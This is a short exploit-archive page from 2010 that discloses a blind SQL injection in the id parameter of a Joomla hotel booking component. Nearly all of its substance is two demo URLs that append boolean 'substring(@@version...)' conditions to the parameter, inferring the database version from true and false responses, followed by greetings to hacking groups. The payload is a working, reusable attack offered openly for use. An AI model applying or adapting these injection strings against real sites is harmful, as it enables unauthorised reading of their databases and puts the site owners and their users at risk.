[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
# Published : 2010-01-07
# Author : Hussin X
# Previous Title : 0day Drupal <= 6.15 Multiple Permanent XSS
# Next Title : ITaco Group ITaco.biz (view_news) SQL Injection Vulnerability


Joomla Component Regional Booking (id) Blind SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com/vb

___________________________________

script : http://www.joomlahbs.com/


Demo :
_______


http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=4 > ( FALSE )



http://site.com/p3/index.php?option=com_tophotelmodule&task=showhoteldetails&id=3+and substring(@@version,1,1)=5 > ( TRUE )






Greetz : IQ-SecuritY Members | Milw0rM | SecurityReason
ALL Arabic Hack And Kurdish hack